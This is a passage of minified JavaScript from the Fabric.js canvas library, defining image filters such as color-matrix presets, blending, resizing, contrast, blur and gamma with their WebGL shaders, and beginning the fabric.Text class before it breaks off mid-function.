g=E.fabric||(E.fabric={}),b=g.Image.filters,_=g.util.createClass,y={Brownie:[.5997,.34553,-.27082,0,.186,-.0377,.86095,.15059,0,-.1449,.24113,-.07441,.44972,0,-.02965,0,0,0,1,0],Vintage:[.62793,.32021,-.03965,0,.03784,.02578,.64411,.03259,0,.02926,.0466,-.08512,.52416,0,.02023,0,0,0,1,0],Kodachrome:[1.12855,-.39673,-.03992,0,.24991,-.16404,1.08352,-.05498,0,.09698,-.16786,-.56034,1.60148,0,.13972,0,0,0,1,0],Technicolor:[1.91252,-.85453,-.09155,0,.04624,-.30878,1.76589,-.10601,0,-.27589,-.2311,-.75018,1.84759,0,.12137,0,0,0,1,0],Polaroid:[1.438,-.062,-.062,0,0,-.122,1.378,-.122,0,0,-.016,-.016,1.483,0,0,0,0,0,1,0],Sepia:[.393,.769,.189,0,0,.349,.686,.168,0,0,.272,.534,.131,0,0,0,0,0,1,0],BlackWhite:[1.5,1.5,1.5,0,-1,1.5,1.5,1.5,0,-1,1.5,1.5,1.5,0,-1,0,0,0,1,0]};for(var M in y)b[M]=_(b.ColorMatrix,{type:M,matrix:y[M],mainParameter:!1,colorsOnly:!0}),g.Image.filters[M].fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric,b=g.Image.filters;b.BlendColor=(0,g.util.createClass)(b.BaseFilter,{type:"BlendColor",color:"#F95C63",mode:"multiply",alpha:1,fragmentSource:{multiply:"gl_FragColor.rgb *= uColor.rgb;\n",screen:"gl_FragColor.rgb = 1.0 - (1.0 - gl_FragColor.rgb) * (1.0 - uColor.rgb);\n",add:"gl_FragColor.rgb += uColor.rgb;\n",diff:"gl_FragColor.rgb = abs(gl_FragColor.rgb - uColor.rgb);\n",subtract:"gl_FragColor.rgb -= uColor.rgb;\n",lighten:"gl_FragColor.rgb = max(gl_FragColor.rgb, uColor.rgb);\n",darken:"gl_FragColor.rgb = min(gl_FragColor.rgb, uColor.rgb);\n",exclusion:"gl_FragColor.rgb += uColor.rgb - 2.0 * (uColor.rgb * gl_FragColor.rgb);\n",overlay:"if (uColor.r < 0.5) {\ngl_FragColor.r *= 2.0 * uColor.r;\n} else {\ngl_FragColor.r = 1.0 - 2.0 * (1.0 - gl_FragColor.r) * (1.0 - uColor.r);\n}\nif (uColor.g < 0.5) {\ngl_FragColor.g *= 2.0 * uColor.g;\n} else {\ngl_FragColor.g = 1.0 - 2.0 * (1.0 - gl_FragColor.g) * (1.0 - uColor.g);\n}\nif (uColor.b < 0.5) {\ngl_FragColor.b *= 2.0 * uColor.b;\n} else {\ngl_FragColor.b = 1.0 - 2.0 * (1.0 - gl_FragColor.b) * (1.0 - uColor.b);\n}\n",tint:"gl_FragColor.rgb *= (1.0 - uColor.a);\ngl_FragColor.rgb += uColor.rgb;\n"},buildSource:function(y){return"precision highp float;\nuniform sampler2D uTexture;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\ngl_FragColor = color;\nif (color.a > 0.0) {\n"+this.fragmentSource[y]+"}\n}"},retrieveShader:function(y){var p,M=this.type+"_"+this.mode;return y.programCache.hasOwnProperty(M)||(p=this.buildSource(this.mode),y.programCache[M]=this.createProgram(y.context,p)),y.programCache[M]},applyTo2d:function(y){var w,x,S,O,U,K,ee,p=y.imageData.data,D=p.length,se=1-this.alpha;w=(ee=new g.Color(this.color).getSource())[0]*this.alpha,x=ee[1]*this.alpha,S=ee[2]*this.alpha;for(var ve=0;ve<D;ve+=4)switch(O=p[ve],U=p[ve+1],K=p[ve+2],this.mode){case"multiply":p[ve]=O*w/255,p[ve+1]=U*x/255,p[ve+2]=K*S/255;break;case"screen":p[ve]=255-(255-O)*(255-w)/255,p[ve+1]=255-(255-U)*(255-x)/255,p[ve+2]=255-(255-K)*(255-S)/255;break;case"add":p[ve]=O+w,p[ve+1]=U+x,p[ve+2]=K+S;break;case"diff":case"difference":p[ve]=Math.abs(O-w),p[ve+1]=Math.abs(U-x),p[ve+2]=Math.abs(K-S);break;case"subtract":p[ve]=O-w,p[ve+1]=U-x,p[ve+2]=K-S;break;case"darken":p[ve]=Math.min(O,w),p[ve+1]=Math.min(U,x),p[ve+2]=Math.min(K,S);break;case"lighten":p[ve]=Math.max(O,w),p[ve+1]=Math.max(U,x),p[ve+2]=Math.max(K,S);break;case"overlay":p[ve]=w<128?2*O*w/255:255-2*(255-O)*(255-w)/255,p[ve+1]=x<128?2*U*x/255:255-2*(255-U)*(255-x)/255,p[ve+2]=S<128?2*K*S/255:255-2*(255-K)*(255-S)/255;break;case"exclusion":p[ve]=w+O-2*w*O/255,p[ve+1]=x+U-2*x*U/255,p[ve+2]=S+K-2*S*K/255;break;case"tint":p[ve]=w+O*se,p[ve+1]=x+U*se,p[ve+2]=S+K*se}},getUniformLocations:function(y,M){return{uColor:y.getUniformLocation(M,"uColor")}},sendUniformData:function(y,M){var p=new g.Color(this.color).getSource();p[0]=this.alpha*p[0]/255,p[1]=this.alpha*p[1]/255,p[2]=this.alpha*p[2]/255,p[3]=this.alpha,y.uniform4fv(M.uColor,p)},toObject:function(){return{type:this.type,color:this.color,mode:this.mode,alpha:this.alpha}}}),g.Image.filters.BlendColor.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric,b=g.Image.filters;b.BlendImage=(0,g.util.createClass)(b.BaseFilter,{type:"BlendImage",image:null,mode:"multiply",alpha:1,vertexSource:"attribute vec2 aPosition;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nuniform mat3 uTransformMatrix;\nvoid main() {\nvTexCoord = aPosition;\nvTexCoord2 = (uTransformMatrix * vec3(aPosition, 1.0)).xy;\ngl_Position = vec4(aPosition * 2.0 - 1.0, 0.0, 1.0);\n}",fragmentSource:{multiply:"precision highp float;\nuniform sampler2D uTexture;\nuniform sampler2D uImage;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec4 color2 = texture2D(uImage, vTexCoord2);\ncolor.rgba *= color2.rgba;\ngl_FragColor = color;\n}",mask:"precision highp float;\nuniform sampler2D uTexture;\nuniform sampler2D uImage;\nuniform vec4 uColor;\nvarying vec2 vTexCoord;\nvarying vec2 vTexCoord2;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec4 color2 = texture2D(uImage, vTexCoord2);\ncolor.a = color2.a;\ngl_FragColor = color;\n}"},retrieveShader:function(y){var M=this.type+"_"+this.mode,p=this.fragmentSource[this.mode];return y.programCache.hasOwnProperty(M)||(y.programCache[M]=this.createProgram(y.context,p)),y.programCache[M]},applyToWebGL:function(y){var M=y.context,p=this.createTexture(y.filterBackend,this.image);this.bindAdditionalTexture(M,p,M.TEXTURE1),this.callSuper("applyToWebGL",y),this.unbindAdditionalTexture(M,M.TEXTURE1)},createTexture:function(y,M){return y.getCachedTexture(M.cacheKey,M._element)},calculateMatrix:function(){var y=this.image;return[1/y.scaleX,0,0,0,1/y.scaleY,0,-y.left/y._element.width,-y.top/y._element.height,1]},applyTo2d:function(y){var O,U,K,ee,se,ve,le,ye,z,l,A,M=y.imageData,p=y.filterBackend.resources,D=M.data,w=D.length,x=M.width,S=M.height,f=this.image;p.blendImage||(p.blendImage=g.util.createCanvasElement()),l=(z=p.blendImage).getContext("2d"),z.width!==x||z.height!==S?(z.width=x,z.height=S):l.clearRect(0,0,x,S),l.setTransform(f.scaleX,0,0,f.scaleY,f.left,f.top),l.drawImage(f._element,0,0,x,S),A=l.getImageData(0,0,x,S).data;for(var v=0;v<w;v+=4)switch(se=D[v],ve=D[v+1],le=D[v+2],ye=D[v+3],O=A[v],U=A[v+1],K=A[v+2],ee=A[v+3],this.mode){case"multiply":D[v]=se*O/255,D[v+1]=ve*U/255,D[v+2]=le*K/255,D[v+3]=ye*ee/255;break;case"mask":D[v+3]=ee}},getUniformLocations:function(y,M){return{uTransformMatrix:y.getUniformLocation(M,"uTransformMatrix"),uImage:y.getUniformLocation(M,"uImage")}},sendUniformData:function(y,M){var p=this.calculateMatrix();y.uniform1i(M.uImage,1),y.uniformMatrix3fv(M.uTransformMatrix,!1,p)},toObject:function(){return{type:this.type,image:this.image&&this.image.toObject(),mode:this.mode,alpha:this.alpha}}}),g.Image.filters.BlendImage.fromObject=function(y,M){g.Image.fromObject(y.image,function(p){var D=g.util.object.clone(y);D.image=p,M(new g.Image.filters.BlendImage(D))})}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=Math.pow,_=Math.floor,y=Math.sqrt,M=Math.abs,p=Math.round,D=Math.sin,w=Math.ceil,x=g.Image.filters;x.Resize=(0,g.util.createClass)(x.BaseFilter,{type:"Resize",resizeType:"hermite",scaleX:1,scaleY:1,lanczosLobes:3,getUniformLocations:function(O,U){return{uDelta:O.getUniformLocation(U,"uDelta"),uTaps:O.getUniformLocation(U,"uTaps")}},sendUniformData:function(O,U){O.uniform2fv(U.uDelta,this.horizontal?[1/this.width,0]:[0,1/this.height]),O.uniform1fv(U.uTaps,this.taps)},retrieveShader:function(O){var U=this.getFilterWindow(),K=this.type+"_"+U;if(!O.programCache.hasOwnProperty(K)){var ee=this.generateShader(U);O.programCache[K]=this.createProgram(O.context,ee)}return O.programCache[K]},getFilterWindow:function(){return Math.ceil(this.lanczosLobes/this.tempScale)},getTaps:function(){for(var O=this.lanczosCreate(this.lanczosLobes),U=this.tempScale,K=this.getFilterWindow(),ee=new Array(K),se=1;se<=K;se++)ee[se-1]=O(se*U);return ee},generateShader:function(ee){for(var U=new Array(ee),K=this.fragmentSourceTOP,se=1;se<=ee;se++)U[se-1]=se+".0 * uDelta";return K+="uniform float uTaps["+ee+"];\n",K+="void main() {\n",K+="  vec4 color = texture2D(uTexture, vTexCoord);\n",K+="  float sum = 1.0;\n",U.forEach(function(ve,le){K+="  color += texture2D(uTexture, vTexCoord + "+ve+") * uTaps["+le+"];\n",K+="  color += texture2D(uTexture, vTexCoord - "+ve+") * uTaps["+le+"];\n",K+="  sum += 2.0 * uTaps["+le+"];\n"}),K+="  gl_FragColor = color / sum;\n",K+="}"},fragmentSourceTOP:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec2 uDelta;\nvarying vec2 vTexCoord;\n",applyTo:function(O){O.webgl?(O.passes++,this.width=O.sourceWidth,this.horizontal=!0,this.dW=Math.round(this.width*this.scaleX),this.dH=O.sourceHeight,this.tempScale=this.dW/this.width,this.taps=this.getTaps(),O.destinationWidth=this.dW,this._setupFrameBuffer(O),this.applyToWebGL(O),this._swapTextures(O),O.sourceWidth=O.destinationWidth,this.height=O.sourceHeight,this.horizontal=!1,this.dH=Math.round(this.height*this.scaleY),this.tempScale=this.dH/this.height,this.taps=this.getTaps(),O.destinationHeight=this.dH,this._setupFrameBuffer(O),this.applyToWebGL(O),this._swapTextures(O),O.sourceHeight=O.destinationHeight):this.applyTo2d(O)},isNeutralState:function(){return 1===this.scaleX&&1===this.scaleY},lanczosCreate:function(O){return function(U){if(U>=O||U<=-O)return 0;if(U<1.1920929e-7&&U>-1.1920929e-7)return 1;var K=(U*=Math.PI)/O;return D(U)/U*D(K)/K}},applyTo2d:function(O){var U=O.imageData,K=this.scaleX,ee=this.scaleY;this.rcpScaleX=1/K,this.rcpScaleY=1/ee;var z,se=U.width,ve=U.height,le=p(se*K),ye=p(ve*ee);"sliceHack"===this.resizeType?z=this.sliceByTwo(O,se,ve,le,ye):"hermite"===this.resizeType?z=this.hermiteFastResize(O,se,ve,le,ye):"bilinear"===this.resizeType?z=this.bilinearFiltering(O,se,ve,le,ye):"lanczos"===this.resizeType&&(z=this.lanczosResize(O,se,ve,le,ye)),O.imageData=z},sliceByTwo:function(O,U,K,ee,se){var v,P,ve=O.imageData,ye=!1,z=!1,l=.5*U,f=.5*K,A=g.filterBackend.resources,G=0,X=0,L=U,h=0;for(A.sliceByTwo||(A.sliceByTwo=document.createElement("canvas")),((v=A.sliceByTwo).width<1.5*U||v.height<K)&&(v.width=1.5*U,v.height=K),(P=v.getContext("2d")).clearRect(0,0,1.5*U,K),P.putImageData(ve,0,0),ee=_(ee),se=_(se);!ye||!z;)U=l,K=f,ee<_(.5*l)?l=_(.5*l):(l=ee,ye=!0),se<_(.5*f)?f=_(.5*f):(f=se,z=!0),P.drawImage(v,G,X,U,K,L,h,l,f),G=L,X=h,h+=f;return P.getImageData(G,X,ee,se)},lanczosResize:function(O,U,K,ee,se){var le=O.imageData.data,ye=O.ctx.createImageData(ee,se),z=ye.data,l=this.lanczosCreate(this.lanczosLobes),f=this.rcpScaleX,A=this.rcpScaleY,v=2/this.rcpScaleX,P=2/this.rcpScaleY,G=w(f*this.lanczosLobes/2),X=w(A*this.lanczosLobes/2),L={},h={},R={};return function ve(J){var Z,ue,Ie,Ae,Ue,Xe,He,Be,qe,De,Ve;for(h.x=(J+.5)*f,R.x=_(h.x),Z=0;Z<se;Z++){for(h.y=(Z+.5)*A,R.y=_(h.y),Ue=0,Xe=0,He=0,Be=0,qe=0,ue=R.x-G;ue<=R.x+G;ue++)if(!(ue<0||ue>=U)){De=_(1e3*M(ue-h.x)),L[De]||(L[De]={});for(var ze=R.y-X;ze<=R.y+X;ze++)ze<0||ze>=K||(Ve=_(1e3*M(ze-h.y)),L[De][Ve]||(L[De][Ve]=l(y(b(De*v,2)+b(Ve*P,2))/1e3)),(Ie=L[De][Ve])>0&&(Ue+=Ie,Xe+=Ie*le[Ae=4*(ze*U+ue)],He+=Ie*le[Ae+1],Be+=Ie*le[Ae+2],qe+=Ie*le[Ae+3]))}z[Ae=4*(Z*ee+J)]=Xe/Ue,z[Ae+1]=He/Ue,z[Ae+2]=Be/Ue,z[Ae+3]=qe/Ue}return++J<ee?ve(J):ye}(0)},bilinearFiltering:function(O,U,K,ee,se){var l,f,A,v,P,G,X,R,h=0,J=this.rcpScaleX,Z=this.rcpScaleY,ue=4*(U-1),Ae=O.imageData.data,Ue=O.ctx.createImageData(ee,se),Xe=Ue.data;for(A=0;A<se;A++)for(v=0;v<ee;v++)for(P=J*v-(l=_(J*v)),G=Z*A-(f=_(Z*A)),R=4*(f*U+l),X=0;X<4;X++)Xe[h++]=Ae[R+X]*(1-P)*(1-G)+Ae[R+4+X]*P*(1-G)+Ae[R+ue+X]*G*(1-P)+Ae[R+ue+4+X]*P*G;return Ue},hermiteFastResize:function(O,U,K,ee,se){for(var ve=this.rcpScaleX,le=this.rcpScaleY,ye=w(ve/2),z=w(le/2),f=O.imageData.data,A=O.ctx.createImageData(ee,se),v=A.data,P=0;P<se;P++)for(var G=0;G<ee;G++){for(var X=4*(G+P*ee),L=0,h=0,R=0,J=0,Z=0,ue=0,Ie=0,Ae=(P+.5)*le,Ue=_(P*le);Ue<(P+1)*le;Ue++)for(var Xe=M(Ae-(Ue+.5))/z,He=(G+.5)*ve,Be=Xe*Xe,qe=_(G*ve);qe<(G+1)*ve;qe++){var De=M(He-(qe+.5))/ye,Ve=y(Be+De*De);Ve>1&&Ve<-1||(L=2*Ve*Ve*Ve-3*Ve*Ve+1)>0&&(Ie+=L*f[3+(De=4*(qe+Ue*U))],R+=L,f[De+3]<255&&(L=L*f[De+3]/250),J+=L*f[De],Z+=L*f[De+1],ue+=L*f[De+2],h+=L)}v[X]=J/h,v[X+1]=Z/h,v[X+2]=ue/h,v[X+3]=Ie/R}return A},toObject:function(){return{type:this.type,scaleX:this.scaleX,scaleY:this.scaleY,resizeType:this.resizeType,lanczosLobes:this.lanczosLobes}}}),g.Image.filters.Resize.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Contrast=(0,g.util.createClass)(b.BaseFilter,{type:"Contrast",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uContrast;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat contrastF = 1.015 * (uContrast + 1.0) / (1.0 * (1.015 - uContrast));\ncolor.rgb = contrastF * (color.rgb - 0.5) + 0.5;\ngl_FragColor = color;\n}",contrast:0,mainParameter:"contrast",applyTo2d:function(y){if(0!==this.contrast){var p,D=y.imageData.data,w=D.length,x=Math.floor(255*this.contrast),S=259*(x+255)/(255*(259-x));for(p=0;p<w;p+=4)D[p]=S*(D[p]-128)+128,D[p+1]=S*(D[p+1]-128)+128,D[p+2]=S*(D[p+2]-128)+128}},getUniformLocations:function(y,M){return{uContrast:y.getUniformLocation(M,"uContrast")}},sendUniformData:function(y,M){y.uniform1f(M.uContrast,this.contrast)}}),g.Image.filters.Contrast.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Saturation=(0,g.util.createClass)(b.BaseFilter,{type:"Saturation",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uSaturation;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat rgMax = max(color.r, color.g);\nfloat rgbMax = max(rgMax, color.b);\ncolor.r += rgbMax != color.r ? (rgbMax - color.r) * uSaturation : 0.00;\ncolor.g += rgbMax != color.g ? (rgbMax - color.g) * uSaturation : 0.00;\ncolor.b += rgbMax != color.b ? (rgbMax - color.b) * uSaturation : 0.00;\ngl_FragColor = color;\n}",saturation:0,mainParameter:"saturation",applyTo2d:function(y){if(0!==this.saturation){var x,S,p=y.imageData.data,D=p.length,w=-this.saturation;for(x=0;x<D;x+=4)S=Math.max(p[x],p[x+1],p[x+2]),p[x]+=S!==p[x]?(S-p[x])*w:0,p[x+1]+=S!==p[x+1]?(S-p[x+1])*w:0,p[x+2]+=S!==p[x+2]?(S-p[x+2])*w:0}},getUniformLocations:function(y,M){return{uSaturation:y.getUniformLocation(M,"uSaturation")}},sendUniformData:function(y,M){y.uniform1f(M.uSaturation,-this.saturation)}}),g.Image.filters.Saturation.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Vibrance=(0,g.util.createClass)(b.BaseFilter,{type:"Vibrance",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform float uVibrance;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nfloat max = max(color.r, max(color.g, color.b));\nfloat avg = (color.r + color.g + color.b) / 3.0;\nfloat amt = (abs(max - avg) * 2.0) * uVibrance;\ncolor.r += max != color.r ? (max - color.r) * amt : 0.00;\ncolor.g += max != color.g ? (max - color.g) * amt : 0.00;\ncolor.b += max != color.b ? (max - color.b) * amt : 0.00;\ngl_FragColor = color;\n}",vibrance:0,mainParameter:"vibrance",applyTo2d:function(y){if(0!==this.vibrance){var x,S,U,p=y.imageData.data,D=p.length,w=-this.vibrance;for(x=0;x<D;x+=4)S=Math.max(p[x],p[x+1],p[x+2]),U=2*Math.abs(S-(p[x]+p[x+1]+p[x+2])/3)/255*w,p[x]+=S!==p[x]?(S-p[x])*U:0,p[x+1]+=S!==p[x+1]?(S-p[x+1])*U:0,p[x+2]+=S!==p[x+2]?(S-p[x+2])*U:0}},getUniformLocations:function(y,M){return{uVibrance:y.getUniformLocation(M,"uVibrance")}},sendUniformData:function(y,M){y.uniform1f(M.uVibrance,-this.vibrance)}}),g.Image.filters.Vibrance.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Blur=(0,g.util.createClass)(b.BaseFilter,{type:"Blur",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec2 uDelta;\nvarying vec2 vTexCoord;\nconst float nSamples = 15.0;\nvec3 v3offset = vec3(12.9898, 78.233, 151.7182);\nfloat random(vec3 scale) {\nreturn fract(sin(dot(gl_FragCoord.xyz, scale)) * 43758.5453);\n}\nvoid main() {\nvec4 color = vec4(0.0);\nfloat total = 0.0;\nfloat offset = random(v3offset);\nfor (float t = -nSamples; t <= nSamples; t++) {\nfloat percent = (t + offset - 0.5) / nSamples;\nfloat weight = 1.0 - abs(percent);\ncolor += texture2D(uTexture, vTexCoord + uDelta * percent) * weight;\ntotal += weight;\n}\ngl_FragColor = color / total;\n}",blur:0,mainParameter:"blur",applyTo:function(y){y.webgl?(this.aspectRatio=y.sourceWidth/y.sourceHeight,y.passes++,this._setupFrameBuffer(y),this.horizontal=!0,this.applyToWebGL(y),this._swapTextures(y),this._setupFrameBuffer(y),this.horizontal=!1,this.applyToWebGL(y),this._swapTextures(y)):this.applyTo2d(y)},applyTo2d:function(y){y.imageData=this.simpleBlur(y)},simpleBlur:function(y){var p,D,M=y.filterBackend.resources,w=y.imageData.width,x=y.imageData.height;M.blurLayer1||(M.blurLayer1=g.util.createCanvasElement(),M.blurLayer2=g.util.createCanvasElement()),D=M.blurLayer2,((p=M.blurLayer1).width!==w||p.height!==x)&&(D.width=p.width=w,D.height=p.height=x);var K,ee,se,ve,S=p.getContext("2d"),O=D.getContext("2d"),U=15,le=.06*this.blur*.5;for(S.putImageData(y.imageData,0,0),O.clearRect(0,0,w,x),ve=-U;ve<=U;ve++)se=le*(ee=ve/U)*w+(K=(Math.random()-.5)/4),O.globalAlpha=1-Math.abs(ee),O.drawImage(p,se,K),S.drawImage(D,0,0),O.globalAlpha=1,O.clearRect(0,0,D.width,D.height);for(ve=-U;ve<=U;ve++)se=le*(ee=ve/U)*x+(K=(Math.random()-.5)/4),O.globalAlpha=1-Math.abs(ee),O.drawImage(p,K,se),S.drawImage(D,0,0),O.globalAlpha=1,O.clearRect(0,0,D.width,D.height);y.ctx.drawImage(p,0,0);var ye=y.ctx.getImageData(0,0,p.width,p.height);return S.globalAlpha=1,S.clearRect(0,0,p.width,p.height),ye},getUniformLocations:function(y,M){return{delta:y.getUniformLocation(M,"uDelta")}},sendUniformData:function(y,M){var p=this.chooseRightDelta();y.uniform2fv(M.delta,p)},chooseRightDelta:function(){var p,y=1,M=[0,0];return this.horizontal?this.aspectRatio>1&&(y=1/this.aspectRatio):this.aspectRatio<1&&(y=this.aspectRatio),p=y*this.blur*.12,this.horizontal?M[0]=p:M[1]=p,M}}),b.Blur.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Gamma=(0,g.util.createClass)(b.BaseFilter,{type:"Gamma",fragmentSource:"precision highp float;\nuniform sampler2D uTexture;\nuniform vec3 uGamma;\nvarying vec2 vTexCoord;\nvoid main() {\nvec4 color = texture2D(uTexture, vTexCoord);\nvec3 correction = (1.0 / uGamma);\ncolor.r = pow(color.r, correction.r);\ncolor.g = pow(color.g, correction.g);\ncolor.b = pow(color.b, correction.b);\ngl_FragColor = color;\ngl_FragColor.rgb *= color.a;\n}",gamma:[1,1,1],mainParameter:"gamma",initialize:function(y){this.gamma=[1,1,1],b.BaseFilter.prototype.initialize.call(this,y)},applyTo2d:function(y){var U,p=y.imageData.data,D=this.gamma,w=p.length,x=1/D[0],S=1/D[1],O=1/D[2];for(this.rVals||(this.rVals=new Uint8Array(256),this.gVals=new Uint8Array(256),this.bVals=new Uint8Array(256)),U=0,w=256;U<w;U++)this.rVals[U]=255*Math.pow(U/255,x),this.gVals[U]=255*Math.pow(U/255,S),this.bVals[U]=255*Math.pow(U/255,O);for(U=0,w=p.length;U<w;U+=4)p[U]=this.rVals[p[U]],p[U+1]=this.gVals[p[U+1]],p[U+2]=this.bVals[p[U+2]]},getUniformLocations:function(y,M){return{uGamma:y.getUniformLocation(M,"uGamma")}},sendUniformData:function(y,M){y.uniform3fv(M.uGamma,this.gamma)}}),g.Image.filters.Gamma.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.Composed=(0,g.util.createClass)(b.BaseFilter,{type:"Composed",subFilters:[],initialize:function(y){this.callSuper("initialize",y),this.subFilters=this.subFilters.slice(0)},applyTo:function(y){y.passes+=this.subFilters.length-1,this.subFilters.forEach(function(M){M.applyTo(y)})},toObject:function(){return g.util.object.extend(this.callSuper("toObject"),{subFilters:this.subFilters.map(function(y){return y.toObject()})})},isNeutralState:function(){return!this.subFilters.some(function(y){return!y.isNeutralState()})}}),g.Image.filters.Composed.fromObject=function(y,M){var D=(y.subFilters||[]).map(function(x){return new g.Image.filters[x.type](x)}),w=new g.Image.filters.Composed({subFilters:D});return M&&M(w),w}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.Image.filters;b.HueRotation=(0,g.util.createClass)(b.ColorMatrix,{type:"HueRotation",rotation:0,mainParameter:"rotation",calculateMatrix:function(){var y=this.rotation*Math.PI,M=g.util.cos(y),p=g.util.sin(y),D=1/3,w=Math.sqrt(D)*p,x=1-M;this.matrix=[1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0],this.matrix[0]=M+x/3,this.matrix[1]=D*x-w,this.matrix[2]=D*x+w,this.matrix[5]=D*x+w,this.matrix[6]=M+D*x,this.matrix[7]=D*x-w,this.matrix[10]=D*x-w,this.matrix[11]=D*x+w,this.matrix[12]=M+D*x},isNeutralState:function(y){return this.calculateMatrix(),b.BaseFilter.prototype.isNeutralState.call(this,y)},applyTo:function(y){this.calculateMatrix(),b.BaseFilter.prototype.applyTo.call(this,y)}}),g.Image.filters.HueRotation.fromObject=g.Image.filters.BaseFilter.fromObject}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.object.clone;if(g.Text)g.warn("fabric.Text is already defined");else{var _="fontFamily fontWeight fontSize text underline overline linethrough textAlign fontStyle lineHeight textBackgroundColor charSpacing styles direction path pathStartOffset pathSide pathAlign".split(" ");g.Text=g.util.createClass(g.Object,{_dimensionAffectingProps:["fontSize","fontWeight","fontFamily","fontStyle","lineHeight","text","charSpacing","textAlign","styles","path","pathStartOffset","pathSide","pathAlign"],_reNewline:/\r?\n/,_reSpacesAndTabs:/[ \t\r]/g,_reSpaceAndTab:/[ \t\r]/,_reWords:/\S+/g,type:"text",fontSize:40,fontWeight:"normal",fontFamily:"Times New Roman",underline:!1,overline:!1,linethrough:!1,textAlign:"left",fontStyle:"normal",lineHeight:1.16,superscript:{size:.6,baseline:-.35},subscript:{size:.6,baseline:.11},textBackgroundColor:"",stateProperties:g.Object.prototype.stateProperties.concat(_),cacheProperties:g.Object.prototype.cacheProperties.concat(_),stroke:null,shadow:null,path:null,pathStartOffset:0,pathSide:"left",pathAlign:"baseline",_fontSizeFraction:.222,offsets:{underline:.1,linethrough:-.315,overline:-.88},_fontSizeMult:1.13,charSpacing:0,styles:null,_measuringContext:null,deltaY:0,direction:"ltr",_styleProperties:["stroke","strokeWidth","fill","fontFamily","fontSize","fontWeight","fontStyle","underline","overline","linethrough","deltaY","textBackgroundColor"],__charBounds:[],CACHE_FONT_SIZE:400,MIN_TEXT_WIDTH:2,initialize:function(y,M){this.styles=M&&M.styles||{},this.text=y,this.__skipDimension=!0,this.callSuper("initialize",M),this.path&&this.setPathInfo(),this.__skipDimension=!1,this.initDimensions(),this.setCoords(),this.setupState({propertySet:"_dimensionAffectingProps"})},setPathInfo:function(){var y=this.path;y&&(y.segmentsInfo=g.util.getPathSegmentsInfo(y.path))},getMeasuringContext:function(){return g._measuringContext||(g._measuringContext=this.canvas&&this.canvas.contextCache||g.util.createCanvasElement().getContext("2d")),g._measuringContext},_splitText:function(){var y=this._splitTextIntoLines(this.text);return this.textLines=y.lines,this._textLines=y.graphemeLines,this._unwrappedTextLines=y._unwrappedLines,this._text=y.graphemeText,y},initDimensions:function(){this.__skipDimension||(this._splitText(),this._clearCache(),this.path?(this.width=this.path.width,this.height=this.path.height):(this.width=this.calcTextWidth()||this.cursorWidth||this.MIN_TEXT_WIDTH,this.height=this.calcTextHeight()),-1!==this.textAlign.indexOf("justify")&&this.enlargeSpaces(),this.saveState({propertySet:"_dimensionAffectingProps"}))},enlargeSpaces:function(){for(var y,M,D,w,x,S,O=0,U=this._textLines.length;O<U;O++)if(("justify"===this.textAlign||O!==U-1&&!this.isEndOfWrapping(O))&&(D=0,w=this._textLines[O],(M=this.getLineWidth(O))<this.width&&(S=this.textLines[O].match(this._reSpacesAndTabs)))){y=(this.width-M)/S.length;for(var K=0,ee=w.length;K<=ee;K++)x=this.__charBounds[O][K],this._reSpaceAndTab.test(w[K])?(x.width+=y,x.kernedWidth+=y,x.left+=D,D+=y):x.left+=D}},isEndOfWrapping:function(y){return y===this._textLines.length-1},missingNewlineOffset:function(){return 1},toString:function(){return"#<fabric.Text ("+this.complexity()+'): { "text": "'+this.text+'", "fontFamily": "'+this.fontFamily+'" }>'},_getCacheCanvasDimensions:function(){var y=this.callSuper("_getCacheCanvasDimensions"),M=this.fontSize;return y.width+=M*y.zoomX,y.height+=M*y.zoomY,y},_render:function(y){var M=this.path;M&&!M.isNotVisible()&&M._render(y),this._setTextStyles(y),this._renderTextLinesBackground(y),this._renderTextDecoration(y,"underline"),this._renderText(y),this._renderTextDecoration(y,"overline"),this._renderTextDecoration(y,"linethrough")},_renderText:function(y){"stroke"===this.paintFirst?(this._renderTextStroke(y),this._renderTextFill(y)):(this._renderTextFill(y),this._renderTextStroke(y))},_setTextStyles:function(y,M,p){if(y.textBaseline="alphabetical",this.path)switch(this.pathAlign){case"center":y.textBaseline="middle";break;case"ascender":y.textBaseline="top";break;case"descender":y.textBaseline="bottom"}y.font=this._getFontDeclaration(M,p)},calcTextWidth:function(){for(var y=this.getLineWidth(0),M=1,p=this._textLines.length;M<p;M++){var D=this.getLineWidth(M);D>y&&(y=D)}return 